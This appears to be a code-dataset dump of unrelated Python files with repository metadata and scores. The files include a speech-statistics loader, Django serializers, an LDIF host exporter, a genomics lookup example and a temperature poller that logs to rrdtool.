from concurrent.futures import ThreadPoolExecutor, as_completed from statistics import median from psycopg2.extras import execute_values import textstat from sklearn.feature_extraction.text import CountVectorizer from textblob import TextBlob from src.db_utils import safe_cursor def get_speech_stats(speech_id): with safe_cursor() as cur: cur.execute('SELECT id, president_id, transcript FROM speeches WHERE id = %s', (speech_id,)) raw_speech = cur.fetchone() speech = {'speech_id': raw_speech.id, 'president_id': raw_speech.president_id, 'speech': raw_speech.transcript} raw_text = speech['speech'] sp_blob = TextBlob(raw_text) speech['polarity'], speech['subjectivity'] = sp_blob.sentiment speech['word_count'] = len(sp_blob.words) speech['sentence_count'] = len(sp_blob.sentences) speech['median_sentence_length'] = median([len(sentence) for sentence in sp_blob.sentences]) common_words = get_top_n_words([raw_text], 50, (1, 1)) unigrams_dict = _format_unigrams(common_words, speech['president_id'], speech['speech_id']) speech['grade_reading_level'] = textstat.coleman_liau_index(raw_text) return speech, unigrams_dict def _format_unigrams(common_words, president_id, speech_id): speech_constants = {'president_id': president_id, 'speech_id': speech_id} return [{'unigram': word, 'count': ct, **speech_constants} for word, ct in common_words] def get_speeches(): with ThreadPoolExecutor(max_workers=10) as executor: futures = [executor.submit(get_speech_stats, speech_id) for speech_id in range(1, 1022)] for future in as_completed(futures): try: load_speech_stats(future.result()) except Exception as exc: print(exc) def load_speech_stats(stats_and_unigrams): stats, unigrams = stats_and_unigrams with safe_cursor() as cur_2: execute_values( cur_2, 'INSERT INTO unigrams' '(president_id, speech_id, unigram, occurrence)' 'VALUES %s', unigrams, '(%(president_id)s, %(speech_id)s, %(unigram)s, %(count)s)' ) with safe_cursor() as cur: cur.execute( 'INSERT INTO speech_stats' '(speech_id, 
polarity, subjectivity, word_count,' 'sentence_count, president_id, grade_reading_level) ' 'VALUES (%(speech_id)s, %(polarity)s, %(subjectivity)s,' '%(word_count)s, %(sentence_count)s, %(president_id)s, %(grade_reading_level)s)', stats ) def get_top_n_words(corpus, n=20, ngram_range=(1, 1)): vec = CountVectorizer(strip_accents='unicode', stop_words='english', ngram_range=ngram_range).fit(corpus) bag_of_words = vec.transform(corpus) sum_words = bag_of_words.sum(axis=0) words_freq = [(word, int(sum_words[0, idx])) for word, idx in vec.vocabulary_.items()] words_freq = sorted(words_freq, key=lambda x: x[1], reverse=True) return words_freq[:n]
none
1
2.70919
3
operations/operation.py
zylamarek/dataset-tools
0
6623612
from dataset import Dataset class Operation: def __init__(self, path_in, prepend_name='', is_sequence=False, keep_filenames=False, cache_out=False): self.prepend_name = prepend_name if path_in[-1] == '/' or path_in[-1] == '\\': path_in = path_in[:-1] self.path_in = path_in self.data_in = Dataset(path_in) self.path_out = self.path_in + '_' + self.name() self.data_out = Dataset(self.path_out, cache=cache_out) self.is_sequence = is_sequence self.keep_filenames = keep_filenames self.cache_out = cache_out def name(self): return self.prepend_name + self.__class__.__name__ def apply(self): raise NotImplementedError
from dataset import Dataset class Operation: def __init__(self, path_in, prepend_name='', is_sequence=False, keep_filenames=False, cache_out=False): self.prepend_name = prepend_name if path_in[-1] == '/' or path_in[-1] == '\\': path_in = path_in[:-1] self.path_in = path_in self.data_in = Dataset(path_in) self.path_out = self.path_in + '_' + self.name() self.data_out = Dataset(self.path_out, cache=cache_out) self.is_sequence = is_sequence self.keep_filenames = keep_filenames self.cache_out = cache_out def name(self): return self.prepend_name + self.__class__.__name__ def apply(self): raise NotImplementedError
none
1
2.890172
3
house/admin.py
SnailJin/house
0
6623613
<reponame>SnailJin/house # -*- coding: utf-8 -*- ''' Created on 2015年4月20日 @author: jin ''' from django.contrib import admin from django.contrib.auth.admin import UserAdmin from django.contrib.auth.models import User from house.models import UserProfile class UserProfileAdmin(admin.ModelAdmin): pass admin.site.register(UserProfile, UserProfileAdmin)
# -*- coding: utf-8 -*- ''' Created on 2015年4月20日 @author: jin ''' from django.contrib import admin from django.contrib.auth.admin import UserAdmin from django.contrib.auth.models import User from house.models import UserProfile class UserProfileAdmin(admin.ModelAdmin): pass admin.site.register(UserProfile, UserProfileAdmin)
zh
0.643388
# -*- coding: utf-8 -*- Created on 2015年4月20日 @author: jin
1.60344
2
src/pairwise.py
sawyerWeld/PrefGAN
0
6623614
# pairwise.py # The goal of this class is to take a batch of preferences and return either # a matrix of their pairwise probabilities or a flattened vector of them import readPreflib as pref import numpy as np import math # Acts on a set of SOI vote tuples def pairwise_from_votes(votes, num_candidates): n = num_candidates occurance_matrix = np.full(shape = (n,n), dtype = int, fill_value = 0) prob_matrix = np.full(shape = (n,n), dtype = float, fill_value = 0) for vote_ in votes: num_occurances, vote = vote_ # print(vote) for i, v in enumerate(vote): after = vote[i+1:] # print('~',after) if after: for a in after: occurance_matrix[v-1][a-1] += num_occurances for i, inner in enumerate(occurance_matrix): for j, num in enumerate(inner): if i != j: a_succ_b = occurance_matrix[i][j] b_succ_a = occurance_matrix[j][i] # print(a_succ_b, b_succ_a) prob_matrix[i][j] = a_succ_b / (a_succ_b + b_succ_a) prob_matrix = np.triu(prob_matrix, k = 1) return prob_matrix # Acts on a single np array # This one gives a negative one if the 1 would go in the lower triangular bit def vote_vector_to_pairwise(vote): n = len(vote) occurance_matrix = np.full(shape = (n,n), dtype = int, fill_value = 0) for i, v in enumerate(vote): after = vote[i+1:] for a in after: if a != 0: if v < a: occurance_matrix[v-1][a-1] = 1 else: occurance_matrix[a-1][v-1] = -1 return occurance_matrix # previous iterations did not think about the fact that # a vote [1 0 0] does not indicate nothing, it indicates # that 1 succ 2 and 1 succ 3 def pairwise_matrix_singular(vote): n = len(vote) occurance_matrix = np.full(shape = (n,n), dtype = int, fill_value = 0) for i, v in enumerate(vote): if v == 0: continue # list of alts that the current alt is better than better_than = [i+1 for i in range(n)] before = vote[:i+1] for b in before: better_than.remove(b) for p in better_than: occurance_matrix[v-1][p-1] = 1 occurance_matrix[p-1][v-1] = -1 return occurance_matrix # Converts an upper triangular matrix to a vector def 
matrix_to_vec(matrix): vec = [] n = len(matrix[0]) vec_length = n * (n-1) / 2 offset = 1 for inner in matrix: vec.extend(inner[offset:]) offset += 1 return np.array(vec) def vec_to_matrix(vec_): data_type = vec_.dtype vec = list(vec_) m = len(vec) n = math.floor(math.sqrt(2*m)) prob_matrix = np.full(shape = (n+1,n+1), dtype = data_type, fill_value = 0) row_offset = 1 for row in prob_matrix: for i in range(row_offset,n+1): row[i] = vec.pop(0) row_offset += 1 return prob_matrix # Note as I write thesis: this is the one that gets used def process_vote(vote): mat = pairwise_matrix_singular(vote) # print(mat) return matrix_to_vec(mat) # deprecated? # This is what should be used from preference loader # just a wrapper function def process_vote_depr(vote): mat = vote_vector_to_pairwise(vote) vec = matrix_to_vec(mat) return vec if __name__ == '__main__': print('Executing main thread in pairwise.py') np.set_printoptions(precision=3) candidates, votes = pref.readinSOIwfreqs('data_in/Practice/ED-02-Logo.soi') a = np.array([3, 2, 1, 0, 0, 0]) vec = process_vote(a) print(vec) print('mat now') #print(matrix_to_vec(vec)) # prob = pairwise_from_votes(votes[0], len(candidates)) # print(prob) # vec = matrix_to_vec(prob) # print(vec) print(vec_to_matrix(vec)) print(process_vote(a))
# pairwise.py # The goal of this class is to take a batch of preferences and return either # a matrix of their pairwise probabilities or a flattened vector of them import readPreflib as pref import numpy as np import math # Acts on a set of SOI vote tuples def pairwise_from_votes(votes, num_candidates): n = num_candidates occurance_matrix = np.full(shape = (n,n), dtype = int, fill_value = 0) prob_matrix = np.full(shape = (n,n), dtype = float, fill_value = 0) for vote_ in votes: num_occurances, vote = vote_ # print(vote) for i, v in enumerate(vote): after = vote[i+1:] # print('~',after) if after: for a in after: occurance_matrix[v-1][a-1] += num_occurances for i, inner in enumerate(occurance_matrix): for j, num in enumerate(inner): if i != j: a_succ_b = occurance_matrix[i][j] b_succ_a = occurance_matrix[j][i] # print(a_succ_b, b_succ_a) prob_matrix[i][j] = a_succ_b / (a_succ_b + b_succ_a) prob_matrix = np.triu(prob_matrix, k = 1) return prob_matrix # Acts on a single np array # This one gives a negative one if the 1 would go in the lower triangular bit def vote_vector_to_pairwise(vote): n = len(vote) occurance_matrix = np.full(shape = (n,n), dtype = int, fill_value = 0) for i, v in enumerate(vote): after = vote[i+1:] for a in after: if a != 0: if v < a: occurance_matrix[v-1][a-1] = 1 else: occurance_matrix[a-1][v-1] = -1 return occurance_matrix # previous iterations did not think about the fact that # a vote [1 0 0] does not indicate nothing, it indicates # that 1 succ 2 and 1 succ 3 def pairwise_matrix_singular(vote): n = len(vote) occurance_matrix = np.full(shape = (n,n), dtype = int, fill_value = 0) for i, v in enumerate(vote): if v == 0: continue # list of alts that the current alt is better than better_than = [i+1 for i in range(n)] before = vote[:i+1] for b in before: better_than.remove(b) for p in better_than: occurance_matrix[v-1][p-1] = 1 occurance_matrix[p-1][v-1] = -1 return occurance_matrix # Converts an upper triangular matrix to a vector def 
matrix_to_vec(matrix): vec = [] n = len(matrix[0]) vec_length = n * (n-1) / 2 offset = 1 for inner in matrix: vec.extend(inner[offset:]) offset += 1 return np.array(vec) def vec_to_matrix(vec_): data_type = vec_.dtype vec = list(vec_) m = len(vec) n = math.floor(math.sqrt(2*m)) prob_matrix = np.full(shape = (n+1,n+1), dtype = data_type, fill_value = 0) row_offset = 1 for row in prob_matrix: for i in range(row_offset,n+1): row[i] = vec.pop(0) row_offset += 1 return prob_matrix # Note as I write thesis: this is the one that gets used def process_vote(vote): mat = pairwise_matrix_singular(vote) # print(mat) return matrix_to_vec(mat) # deprecated? # This is what should be used from preference loader # just a wrapper function def process_vote_depr(vote): mat = vote_vector_to_pairwise(vote) vec = matrix_to_vec(mat) return vec if __name__ == '__main__': print('Executing main thread in pairwise.py') np.set_printoptions(precision=3) candidates, votes = pref.readinSOIwfreqs('data_in/Practice/ED-02-Logo.soi') a = np.array([3, 2, 1, 0, 0, 0]) vec = process_vote(a) print(vec) print('mat now') #print(matrix_to_vec(vec)) # prob = pairwise_from_votes(votes[0], len(candidates)) # print(prob) # vec = matrix_to_vec(prob) # print(vec) print(vec_to_matrix(vec)) print(process_vote(a))
en
0.83887
# pairwise.py # The goal of this class is to take a batch of preferences and return either # a matrix of their pairwise probabilities or a flattened vector of them # Acts on a set of SOI vote tuples # print(vote) # print('~',after) # print(a_succ_b, b_succ_a) # Acts on a single np array # This one gives a negative one if the 1 would go in the lower triangular bit # previous iterations did not think about the fact that # a vote [1 0 0] does not indicate nothing, it indicates # that 1 succ 2 and 1 succ 3 # list of alts that the current alt is better than # Converts an upper triangular matrix to a vector # Note as I write thesis: this is the one that gets used # print(mat) # deprecated? # This is what should be used from preference loader # just a wrapper function #print(matrix_to_vec(vec)) # prob = pairwise_from_votes(votes[0], len(candidates)) # print(prob) # vec = matrix_to_vec(prob) # print(vec)
3.226279
3
profiles_api/serializers.py
UsamaNaseerBaig/django_rest_api
0
6623615
<reponame>UsamaNaseerBaig/django_rest_api<filename>profiles_api/serializers.py from rest_framework import serializers from profiles_api import models class HelloSerializer(serializers.Serializer): """Serializers namefield for testing our api view """ name = serializers.CharField(max_length = 10) class UserProfileSerializer(serializers.ModelSerializer): """Serializer a user profile Object""" class Meta: model = models.UserProfile fields = ('id','email','name','password') extra_kwargs = { 'password': { 'write_only':True, 'style': {'input_type': 'password'} } } def create(self, validated_data): """Create and return a new user""" user = models.UserProfile.objects.create_user( email = validated_data['email'], name = validated_data['name'], password = validated_data['password'], ) return user class ProfileFeedItemSerializer(serializers.ModelSerializer): """Serializer profile feed item""" class Meta: model = models.ProfileFeedItem fields = ('id','user_profile','status_text','created_on') extra_kwargs = {'user_profile':{'read_only':True}}
from rest_framework import serializers from profiles_api import models class HelloSerializer(serializers.Serializer): """Serializers namefield for testing our api view """ name = serializers.CharField(max_length = 10) class UserProfileSerializer(serializers.ModelSerializer): """Serializer a user profile Object""" class Meta: model = models.UserProfile fields = ('id','email','name','password') extra_kwargs = { 'password': { 'write_only':True, 'style': {'input_type': 'password'} } } def create(self, validated_data): """Create and return a new user""" user = models.UserProfile.objects.create_user( email = validated_data['email'], name = validated_data['name'], password = validated_data['password'], ) return user class ProfileFeedItemSerializer(serializers.ModelSerializer): """Serializer profile feed item""" class Meta: model = models.ProfileFeedItem fields = ('id','user_profile','status_text','created_on') extra_kwargs = {'user_profile':{'read_only':True}}
en
0.707246
Serializers namefield for testing our api view Serializer a user profile Object Create and return a new user Serializer profile feed item
2.58332
3
hosts-ldif/hosts-ldif.py
hfuru/mreg-tools
0
6623616
import argparse import configparser import io import os import pathlib import sys import fasteners import requests parentdir = pathlib.Path(__file__).resolve().parent.parent sys.path.append(str(parentdir)) import common.connection import common.utils from common.utils import error, updated_entries from common.LDIFutils import entry_string, make_head_entry def create_ldif(hosts, srvs, ignore_size_change): def _base_entry(name): return { 'dn': f'host={name},{dn}', 'host': name, 'objectClass': 'uioHostinfo', } def _write(entry): f.write(entry_string(entry)) f = io.StringIO() dn = cfg['ldif']['dn'] _write(make_head_entry(cfg)) for i in hosts: entry = _base_entry(i["name"]) entry.update({ 'uioHostComment': i['comment'], 'uioHostContact': i['contact'], }) mac = {ip['macaddress'] for ip in i['ipaddresses'] if ip['macaddress']} if mac: entry['uioHostMacAddr'] = sorted(mac) _write(entry) for cinfo in i["cnames"]: _write(_base_entry(cinfo["name"])) for i in srvs: _write(_base_entry(i["name"])) try: common.utils.write_file(cfg['default']['filename'], f, ignore_size_change=ignore_size_change) except common.utils.TooManyLineChanges as e: error(e.message) @common.utils.timing def get_entries(url): if '?' in url: url += '&' else: url += '?' 
url += 'page_size=1000&ordering=name' return conn.get_list(url) @common.utils.timing def hosts_ldif(args): for i in ('destdir', 'workdir',): common.utils.mkdir(cfg['default'][i]) def _url(path): url = requests.compat.urljoin(cfg["mreg"]["url"], path) if cfg.has_option("mreg", "zone"): zones = cfg["mreg"]["zone"] url += f"?zone__name__in={zones}" return url hosts_url = _url("/api/v1/hosts/") srvs_url = _url("/api/v1/srvs/") lockfile = os.path.join(cfg['default']['workdir'], __file__ + 'lockfile') lock = fasteners.InterProcessLock(lockfile) if lock.acquire(blocking=False): if updated_entries(conn, hosts_url, 'hosts.json') or \ updated_entries(conn, srvs_url, 'srvs.json') or args.force_check: hosts = get_entries(hosts_url) srvs = get_entries(srvs_url) create_ldif(hosts, srvs, args.ignore_size_change) if 'postcommand' in cfg['default']: common.utils.run_postcommand() else: logger.info("No updated hosts") lock.release() else: logger.warning(f"Could not lock on {lockfile}") def main(): global cfg, conn, logger parser = argparse.ArgumentParser(description="Export hosts from mreg as a ldif.") parser.add_argument("--config", default="hosts-ldif.conf", help="path to config file (default: %(default)s)") parser.add_argument('--force-check', action='store_true', help='force refresh of data from mreg') parser.add_argument('--ignore-size-change', action='store_true', help='ignore size changes') args = parser.parse_args() cfg = configparser.ConfigParser() cfg.optionxform = str cfg.read(args.config) for i in ('default', 'mreg', 'ldif'): if i not in cfg: error(f"Missing section {i} in config file", os.EX_CONFIG) if 'filename' not in cfg['default']: error(f"Missing 'filename' in default section in config file", os.EX_CONFIG) common.utils.cfg = cfg logger = common.utils.getLogger() conn = common.connection.Connection(cfg['mreg']) hosts_ldif(args) if __name__ == '__main__': main()
import argparse import configparser import io import os import pathlib import sys import fasteners import requests parentdir = pathlib.Path(__file__).resolve().parent.parent sys.path.append(str(parentdir)) import common.connection import common.utils from common.utils import error, updated_entries from common.LDIFutils import entry_string, make_head_entry def create_ldif(hosts, srvs, ignore_size_change): def _base_entry(name): return { 'dn': f'host={name},{dn}', 'host': name, 'objectClass': 'uioHostinfo', } def _write(entry): f.write(entry_string(entry)) f = io.StringIO() dn = cfg['ldif']['dn'] _write(make_head_entry(cfg)) for i in hosts: entry = _base_entry(i["name"]) entry.update({ 'uioHostComment': i['comment'], 'uioHostContact': i['contact'], }) mac = {ip['macaddress'] for ip in i['ipaddresses'] if ip['macaddress']} if mac: entry['uioHostMacAddr'] = sorted(mac) _write(entry) for cinfo in i["cnames"]: _write(_base_entry(cinfo["name"])) for i in srvs: _write(_base_entry(i["name"])) try: common.utils.write_file(cfg['default']['filename'], f, ignore_size_change=ignore_size_change) except common.utils.TooManyLineChanges as e: error(e.message) @common.utils.timing def get_entries(url): if '?' in url: url += '&' else: url += '?' 
url += 'page_size=1000&ordering=name' return conn.get_list(url) @common.utils.timing def hosts_ldif(args): for i in ('destdir', 'workdir',): common.utils.mkdir(cfg['default'][i]) def _url(path): url = requests.compat.urljoin(cfg["mreg"]["url"], path) if cfg.has_option("mreg", "zone"): zones = cfg["mreg"]["zone"] url += f"?zone__name__in={zones}" return url hosts_url = _url("/api/v1/hosts/") srvs_url = _url("/api/v1/srvs/") lockfile = os.path.join(cfg['default']['workdir'], __file__ + 'lockfile') lock = fasteners.InterProcessLock(lockfile) if lock.acquire(blocking=False): if updated_entries(conn, hosts_url, 'hosts.json') or \ updated_entries(conn, srvs_url, 'srvs.json') or args.force_check: hosts = get_entries(hosts_url) srvs = get_entries(srvs_url) create_ldif(hosts, srvs, args.ignore_size_change) if 'postcommand' in cfg['default']: common.utils.run_postcommand() else: logger.info("No updated hosts") lock.release() else: logger.warning(f"Could not lock on {lockfile}") def main(): global cfg, conn, logger parser = argparse.ArgumentParser(description="Export hosts from mreg as a ldif.") parser.add_argument("--config", default="hosts-ldif.conf", help="path to config file (default: %(default)s)") parser.add_argument('--force-check', action='store_true', help='force refresh of data from mreg') parser.add_argument('--ignore-size-change', action='store_true', help='ignore size changes') args = parser.parse_args() cfg = configparser.ConfigParser() cfg.optionxform = str cfg.read(args.config) for i in ('default', 'mreg', 'ldif'): if i not in cfg: error(f"Missing section {i} in config file", os.EX_CONFIG) if 'filename' not in cfg['default']: error(f"Missing 'filename' in default section in config file", os.EX_CONFIG) common.utils.cfg = cfg logger = common.utils.getLogger() conn = common.connection.Connection(cfg['mreg']) hosts_ldif(args) if __name__ == '__main__': main()
none
1
2.207468
2
gbe_browser/models-example.bk.py
whyrg/GlobalBiobankEngine
0
6623617
import scidbpy import lookups import utils import numpy db = scidbpy.connect() gene_names = ['RUNX3'] # Set to None to get all genes icds = ['HC49', 'HC382'] # Set to None to get all ICDs # SciDB lookups # --- # return 1-dimension NumPy arrays gene_variant = lookups.get_gene_variant(db, gene_names=gene_names, icds=icds) variant_icd = lookups.get_variant_icd(db, gene_names=gene_names, icds=icds) print(gene_variant) print(variant_icd) print(len(gene_variant)) print(len(variant_icd)) #print(variant_icd[numpy.where(variant_icd['pos'] == 25243960)]) print(variant_icd[(variant_icd['icd']['val'] == "HC382") & (variant_icd['chrom'] == 1) & (variant_icd['pos'] == 25243960)]) # List of attributes available in each array # --- # Some attributes will have `null` and `val` sub-attributes. `null` # stores the SciDB null code, while `val` stores the actual value (if # attribute is not null) print(gene_variant.dtype) print(variant_icd.dtype) # vep_annotations processing # --- # Extract vep_annotations of the first gene result gene_id = gene_variant[0]['gene_id']['val'] csq = gene_variant[0]['csq']['val'] rsid = gene_variant[0]['rsid'] print("RSID") print(rsid) print('CHROM',gene_variant[0]['chrom']) vep_annotations = lookups.parse_vep_annotations(csq, gene_id=gene_id) variant = {} # additional variant info # Use exising utils function to populate extra variant info utils.add_consequence_to_variant(variant, vep_annotations) print(variant['category']) print(variant['major_consequence']) print(variant['HGVSp'])
import scidbpy import lookups import utils import numpy db = scidbpy.connect() gene_names = ['RUNX3'] # Set to None to get all genes icds = ['HC49', 'HC382'] # Set to None to get all ICDs # SciDB lookups # --- # return 1-dimension NumPy arrays gene_variant = lookups.get_gene_variant(db, gene_names=gene_names, icds=icds) variant_icd = lookups.get_variant_icd(db, gene_names=gene_names, icds=icds) print(gene_variant) print(variant_icd) print(len(gene_variant)) print(len(variant_icd)) #print(variant_icd[numpy.where(variant_icd['pos'] == 25243960)]) print(variant_icd[(variant_icd['icd']['val'] == "HC382") & (variant_icd['chrom'] == 1) & (variant_icd['pos'] == 25243960)]) # List of attributes available in each array # --- # Some attributes will have `null` and `val` sub-attributes. `null` # stores the SciDB null code, while `val` stores the actual value (if # attribute is not null) print(gene_variant.dtype) print(variant_icd.dtype) # vep_annotations processing # --- # Extract vep_annotations of the first gene result gene_id = gene_variant[0]['gene_id']['val'] csq = gene_variant[0]['csq']['val'] rsid = gene_variant[0]['rsid'] print("RSID") print(rsid) print('CHROM',gene_variant[0]['chrom']) vep_annotations = lookups.parse_vep_annotations(csq, gene_id=gene_id) variant = {} # additional variant info # Use exising utils function to populate extra variant info utils.add_consequence_to_variant(variant, vep_annotations) print(variant['category']) print(variant['major_consequence']) print(variant['HGVSp'])
en
0.620622
# Set to None to get all genes # Set to None to get all ICDs # SciDB lookups # --- # return 1-dimension NumPy arrays #print(variant_icd[numpy.where(variant_icd['pos'] == 25243960)]) # List of attributes available in each array # --- # Some attributes will have `null` and `val` sub-attributes. `null` # stores the SciDB null code, while `val` stores the actual value (if # attribute is not null) # vep_annotations processing # --- # Extract vep_annotations of the first gene result # additional variant info # Use exising utils function to populate extra variant info
2.671485
3
setup.py
02strich/django-auth-kerberos
18
6623618
#!/usr/bin/env python from setuptools import setup, find_packages import sys if sys.platform.startswith("win"): pykerberos = 'kerberos-sspi>=0.2' else: pykerberos = 'pykerberos>=1.1.10' setup( name="django-auth-kerberos", version="1.2.5", description="Kerberos authentication backend for Django", long_description="Kerberos authentication backend for Django", url="https://github.com/02strich/django-auth-kerberos", author="<NAME>", author_email="<EMAIL>", license="MIT", classifiers=[ "Development Status :: 5 - Production/Stable", "Environment :: Web Environment", "Programming Language :: Python", "Programming Language :: Python :: 2", "Framework :: Django", "Intended Audience :: Developers", "Intended Audience :: System Administrators", "License :: OSI Approved :: MIT License", "Topic :: Internet :: WWW/HTTP", "Topic :: Software Development :: Libraries :: Python Modules", ], keywords=["django", "kerberos", "authentication", "auth"], packages=find_packages(exclude='tests'), install_requires=[ 'Django>=1.6', pykerberos, ], )
#!/usr/bin/env python from setuptools import setup, find_packages import sys if sys.platform.startswith("win"): pykerberos = 'kerberos-sspi>=0.2' else: pykerberos = 'pykerberos>=1.1.10' setup( name="django-auth-kerberos", version="1.2.5", description="Kerberos authentication backend for Django", long_description="Kerberos authentication backend for Django", url="https://github.com/02strich/django-auth-kerberos", author="<NAME>", author_email="<EMAIL>", license="MIT", classifiers=[ "Development Status :: 5 - Production/Stable", "Environment :: Web Environment", "Programming Language :: Python", "Programming Language :: Python :: 2", "Framework :: Django", "Intended Audience :: Developers", "Intended Audience :: System Administrators", "License :: OSI Approved :: MIT License", "Topic :: Internet :: WWW/HTTP", "Topic :: Software Development :: Libraries :: Python Modules", ], keywords=["django", "kerberos", "authentication", "auth"], packages=find_packages(exclude='tests'), install_requires=[ 'Django>=1.6', pykerberos, ], )
ru
0.26433
#!/usr/bin/env python
1.410067
1
mode/examples/Basics/Math/Noise3D/Noise3D.pyde
timgates42/processing.py
1,224
6623619
<reponame>timgates42/processing.py """ Noise3D. Using 3D noise to create simple animated texture. Here, the third dimension ('z') is treated as time. """ increment = 0.01 # The noise function's 3rd argument, a global variable that increments # once per cycle zoff = 0.0 # We will increment zoff differently than xoff and yoff zincrement = 0.02 def setup(): size(640, 360) frameRate(30) def draw(): global zoff # Optional: adjust noise detail here # noiseDetail(8,0.65f) loadPixels() xoff = 0.0 # Start xoff at 0 # For every x,y coordinate in a 2D space, calculate a noise value and # produce a brightness value for x in xrange(width): xoff += increment # Increment xoff yoff = 0.0 # For every xoff, start yoff at 0 for y in xrange(height): yoff += increment # Increment yoff # Calculate noise and scale by 255 bright = noise(xoff, yoff, zoff) * 255 # Try using this line instead # float bright = random(0,255) # Set each pixel onscreen to a grayscale value pixels[x + y * width] = color(bright, bright, bright) updatePixels() zoff += zincrement # Increment zoff
""" Noise3D. Using 3D noise to create simple animated texture. Here, the third dimension ('z') is treated as time. """ increment = 0.01 # The noise function's 3rd argument, a global variable that increments # once per cycle zoff = 0.0 # We will increment zoff differently than xoff and yoff zincrement = 0.02 def setup(): size(640, 360) frameRate(30) def draw(): global zoff # Optional: adjust noise detail here # noiseDetail(8,0.65f) loadPixels() xoff = 0.0 # Start xoff at 0 # For every x,y coordinate in a 2D space, calculate a noise value and # produce a brightness value for x in xrange(width): xoff += increment # Increment xoff yoff = 0.0 # For every xoff, start yoff at 0 for y in xrange(height): yoff += increment # Increment yoff # Calculate noise and scale by 255 bright = noise(xoff, yoff, zoff) * 255 # Try using this line instead # float bright = random(0,255) # Set each pixel onscreen to a grayscale value pixels[x + y * width] = color(bright, bright, bright) updatePixels() zoff += zincrement # Increment zoff
en
0.751031
Noise3D. Using 3D noise to create simple animated texture. Here, the third dimension ('z') is treated as time. # The noise function's 3rd argument, a global variable that increments # once per cycle # We will increment zoff differently than xoff and yoff # Optional: adjust noise detail here # noiseDetail(8,0.65f) # Start xoff at 0 # For every x,y coordinate in a 2D space, calculate a noise value and # produce a brightness value # Increment xoff # For every xoff, start yoff at 0 # Increment yoff # Calculate noise and scale by 255 # Try using this line instead # float bright = random(0,255) # Set each pixel onscreen to a grayscale value # Increment zoff
3.868169
4
pollers/poll-w1.py
JeffreyPowell/pi-van-mon
0
6623620
#!/usr/bin/python import time import datetime import os import yaml config = yaml.safe_load(open("/home/pi/bin/van/config.yaml")) #print( config ) for device in config['devices']['w1']: #print( device ) add = str(config['devices']['w1'][device]['add']) try: x=1 except: pass # Open the file that we viewed earlier so that python can see what is in it. Replace the serial number as before. tfile = open("/sys/bus/w1/devices/"+add+"/w1_slave") # Read all of the text in the file. text = tfile.read() # Close the file now that the text has been read. tfile.close() # Split the text with new lines (\n) and select the second line. secondline = text.split("\n")[1] # Split the line into words, referring to the spaces, and select the 10th word (counting from 0). temperaturedata = secondline.split(" ")[9] # The first two characters are "t=", so get rid of those and convert the temperature from a string to a number. temperature = float(temperaturedata[2:]) # Put the decimal point in the right place and display it. temperature = temperature / 1000 t = datetime.datetime.now().strftime('%s') factor = float(config['devices']['w1'][device]['factor']) offset = float(config['devices']['w1'][device]['offset']) #print( factor, offset ) data = str( ( temperature + offset ) * factor ) filename = '/home/pi/bin/van/data/w1-'+str(add)+'-0.rrd' #print filename if( not os.path.exists( filename ) ): #print ( os.path.exists( filename )) os.system('/usr/bin/rrdtool create '+filename+' --step 60 \ --start now \ DS:data:GAUGE:120:U:U \ RRA:MIN:0.5:1:10080 \ RRA:MIN:0.5:5:51840 \ RRA:MIN:0.5:60:8760 \ RRA:AVERAGE:0.5:1:10080 \ RRA:AVERAGE:0.5:5:51840 \ RRA:AVERAGE:0.5:60:8760 \ RRA:MAX:0.5:1:10080 \ RRA:MAX:0.5:5:51840 \ RRA:MAX:0.5:60:8760') os.system('/usr/bin/rrdtool update '+filename+" "+str(t)+':'+data) #except: #pass
#!/usr/bin/python import time import datetime import os import yaml config = yaml.safe_load(open("/home/pi/bin/van/config.yaml")) #print( config ) for device in config['devices']['w1']: #print( device ) add = str(config['devices']['w1'][device]['add']) try: x=1 except: pass # Open the file that we viewed earlier so that python can see what is in it. Replace the serial number as before. tfile = open("/sys/bus/w1/devices/"+add+"/w1_slave") # Read all of the text in the file. text = tfile.read() # Close the file now that the text has been read. tfile.close() # Split the text with new lines (\n) and select the second line. secondline = text.split("\n")[1] # Split the line into words, referring to the spaces, and select the 10th word (counting from 0). temperaturedata = secondline.split(" ")[9] # The first two characters are "t=", so get rid of those and convert the temperature from a string to a number. temperature = float(temperaturedata[2:]) # Put the decimal point in the right place and display it. temperature = temperature / 1000 t = datetime.datetime.now().strftime('%s') factor = float(config['devices']['w1'][device]['factor']) offset = float(config['devices']['w1'][device]['offset']) #print( factor, offset ) data = str( ( temperature + offset ) * factor ) filename = '/home/pi/bin/van/data/w1-'+str(add)+'-0.rrd' #print filename if( not os.path.exists( filename ) ): #print ( os.path.exists( filename )) os.system('/usr/bin/rrdtool create '+filename+' --step 60 \ --start now \ DS:data:GAUGE:120:U:U \ RRA:MIN:0.5:1:10080 \ RRA:MIN:0.5:5:51840 \ RRA:MIN:0.5:60:8760 \ RRA:AVERAGE:0.5:1:10080 \ RRA:AVERAGE:0.5:5:51840 \ RRA:AVERAGE:0.5:60:8760 \ RRA:MAX:0.5:1:10080 \ RRA:MAX:0.5:5:51840 \ RRA:MAX:0.5:60:8760') os.system('/usr/bin/rrdtool update '+filename+" "+str(t)+':'+data) #except: #pass
en
0.885981
#!/usr/bin/python #print( config ) #print( device ) # Open the file that we viewed earlier so that python can see what is in it. Replace the serial number as before. # Read all of the text in the file. # Close the file now that the text has been read. # Split the text with new lines (\n) and select the second line. # Split the line into words, referring to the spaces, and select the 10th word (counting from 0). # The first two characters are "t=", so get rid of those and convert the temperature from a string to a number. # Put the decimal point in the right place and display it. #print( factor, offset ) #print filename #print ( os.path.exists( filename )) #except: #pass
3.01116
3
evaluators/dialog/__init__.py
kaniblu/vhda
3
6623621
__all__ = ["BLEUEvaluator", "DistinctEvaluator", "SentLengthEvaluator", "RougeEvaluator", "EmbeddingEvaluator", "DialogLengthEvaluator", "WordEntropyEvaluator", "LanguageNoveltyEvaluator", "StateEntropyEvaluator", "StateCountEvaluator", "DistinctStateEvaluator", "StateNoveltyEvaluator"] from .language import * from .length import * from .state import *
__all__ = ["BLEUEvaluator", "DistinctEvaluator", "SentLengthEvaluator", "RougeEvaluator", "EmbeddingEvaluator", "DialogLengthEvaluator", "WordEntropyEvaluator", "LanguageNoveltyEvaluator", "StateEntropyEvaluator", "StateCountEvaluator", "DistinctStateEvaluator", "StateNoveltyEvaluator"] from .language import * from .length import * from .state import *
none
1
1.175738
1
Exercises of Python courses World1-2 and 3/ex039 - Alistamento Militar.py
RafaFurla/Python-Exercises
1
6623622
